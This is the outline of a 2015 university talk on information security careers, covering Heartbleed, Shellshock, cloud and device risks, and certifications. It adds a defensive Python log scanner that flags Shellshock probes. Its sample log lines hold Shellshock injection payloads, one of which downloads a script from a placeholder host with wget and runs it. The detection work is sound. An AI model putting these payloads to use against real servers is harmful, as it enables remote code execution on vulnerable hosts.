Justin David Pineda, C|EH
Lyceum of the Philippines University (LPU), Batangas City, Batangas
February 2, 2015
http://justinspeaks.wordpress.com
Present:
Sr. Application Security Specialist, The Coca-Cola Company
Faculty (Part-time), Asia Pacific College
Past:
Security Analyst, Silversky
The need for information security
Summary of security threats in 2014
Balancing security in the industry
Demand for information security professionals
Security certifications
Software Development – creating a secure application
Network Administration – deployment of firewalls, intrusion detection systems
Think about a security problem that must be solved and apply your CS skills to it.
April 2014: Heartbleed
Security bug in the OpenSSL cryptography library, registered as CVE-2014-0160.
Root cause: improper input validation. The TLS Heartbeat extension (RFC 6520) is used to keep secure sessions alive; a heartbeat request carries a 2-byte payload-length field, and vulnerable versions trusted that field with no bounds check. A request that claimed a large payload but sent a short one was answered with that many bytes copied from the server's memory, so each request could leak up to 64 KB of heap contents (private keys, session cookies, passwords).
Discovered independently by Google Security and Codenomicon; national CERTs such as the Canadian Cyber Incident Response Centre published advisories.
Approx. half a million web servers were affected at the time of disclosure.
Status of different versions:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable
Remediation: upgrade to 1.0.1g (or rebuild with heartbeats disabled), then assume any key or credential that was in server memory may have leaked: reissue certificates, revoke the old ones and reset user passwords.
September 2014: Shellshock
Security bug in the Unix Bash shell, registered as CVE-2014-6271. Bash imported function definitions from environment variables and kept executing whatever followed the function body, so any program that puts attacker-controlled data into the environment (CGI scripts receiving HTTP headers, some DHCP and SSH setups) lets a remote attacker execute arbitrary commands on vulnerable versions.
Affected systems:
Linux, BSD and Mac OS X distributions (anything shipping Bash)
All unpatched Bash versions from 1.14 through 4.3 (i.e. every release until then) are at risk.
Test on your system:
env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
A vulnerable Bash prints "Bash is vulnerable!" before "Bash Test"; a patched Bash prints only "Bash Test" (possibly with a warning about an ignored function definition).
Fix: update Bash to a patched version.
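Beyond testing your own shell, the question operators asked in September 2014 was whether anyone had already tried Shellshock against their web servers. The following is an added example (Python), not part of the original talk: it scans web server access logs in the Apache/nginx "combined" format for the `() {` function-definition prologue in the request line, Referer and User-Agent, the fields CGI copies into the environment. The log lines, IP addresses (RFC 5737 documentation ranges) and payloads are constructed for the demo.

```python
import re
from urllib.parse import unquote

# A Bash function definition smuggled through an environment variable starts
# with "() {". CGI servers copy request headers (User-Agent, Referer, ...) into
# the environment, which is how the bug became remotely reachable.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache/nginx "combined" log format. Quoted fields may contain \" escapes.
_Q = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + _Q + r')" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>' + _Q + r')" "(?P<ua>' + _Q + r')"$'
)

# Constructed sample log lines (not real traffic). Line 1 carries the payload
# in User-Agent, line 3 in Referer, line 4 a variant with a non-empty body;
# line 2 is a normal browser request.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2014:10:12:01 +0800] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 '
    '"-" "() { :;}; /bin/bash -c \\"wget http://203.0.113.9/x.sh -O /tmp/x; sh /tmp/x\\""',
    '198.51.100.4 - - [25/Sep/2014:10:12:05 +0800] "GET /index.html HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [25/Sep/2014:10:12:09 +0800] "GET /cgi-bin/test.cgi HTTP/1.1" 200 64 '
    '"() { :;}; /bin/ping -c 1 203.0.113.9" "curl/7.37.0"',
    '192.0.2.15 - - [25/Sep/2014:10:13:00 +0800] "GET /about HTTP/1.1" 200 900 '
    '"-" "() { ignored; }; echo Cookie: x=1"',
]


def is_shellshock_payload(value):
    """True if a header or URI value carries the function-definition prologue.

    Percent-decoding first catches probes that were URL-encoded to slip past
    naive string matching.
    """
    return bool(SHELLSHOCK_RE.search(unquote(value)))


def scan_log(lines):
    """Return (client ip, field name, field value) for every suspicious request field."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue                      # not combined format; skip rather than guess
        for field in ("request", "referer", "ua"):
            if is_shellshock_payload(m.group(field)):
                hits.append((m.group("ip"), field, m.group(field)))
    return hits


def attacker_ips(lines):
    """Distinct source addresses that sent a Shellshock probe, for blocking or triage."""
    return sorted({ip for ip, _, _ in scan_log(lines)})


if __name__ == "__main__":
    for ip, field, value in scan_log(SAMPLE_LOG):
        print(f"{ip} via {field}: {value}")
    print("sources:", attacker_ips(SAMPLE_LOG))
```

A hit tells you someone probed; whether it worked depends on whether the target was a CGI script run by an unpatched Bash, so the next step in incident response is to check the same host for outbound connections or dropped files matching the payload (the `/tmp/x` download in the first constructed line).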
Companies are starting to move their infrastructure to the cloud.
Caveats:
You lack control of the underlying infrastructure.
You rely on a third party's implementation of the security controls.
Reality: smart devices are getting smaller and smaller, yet more powerful than before.
Caveats: how will companies react?
Should they suppress the use of these devices?
What threats do these smart devices bring?
Issues in responding when a security issue is reported.
For example, BayanPatrol, Hulicam, etc. What should the incident response process be?
Very strict security policies:
No USBs or any removable media
Limited websites that can be visited
Not allowed to send non-work-related e-mails using company e-mail
Need to change password every 30 days
Password complexity requirements
Reuse of passwords is prohibited (a minimum password age is enforced so users cannot cycle straight back to the old password)
Relatively young in the PH. High demand for security professionals; supply is relatively low compared to other IT roles.
Security Operations / Information Risk Management is starting to become an independent department.
IT Security is just a subset of Infosec.
IT Security:
Application Security – securing applications
Host Security – AV, personal firewall
Network Security – firewalls, anti-spam, intrusion detection systems
Other Infosec domains:
Physical security – external and internal controls
Personnel security – managing security guards
Operational security – policies (e.g. no ID no entry, AUP)
Risk management – assessment, remediation
Legal & Regulations – RA 8792 (E-Commerce Act), RA 10175 (Cybercrime Prevention Act of 2012)
CS/IT doesn't have a board exam. You need certifications to prove your expertise (like getting a driver's license).
You need to practice what you learned.
Certifications are internationally recognized.
Certifications will help you professionally.
Goal: from Specialist to Management.
Are we being watched?
Explore the cybercrimes. Create meaningful laws that would "really" benefit the public.
The public, specifically Filipinos, must be protected when transacting online.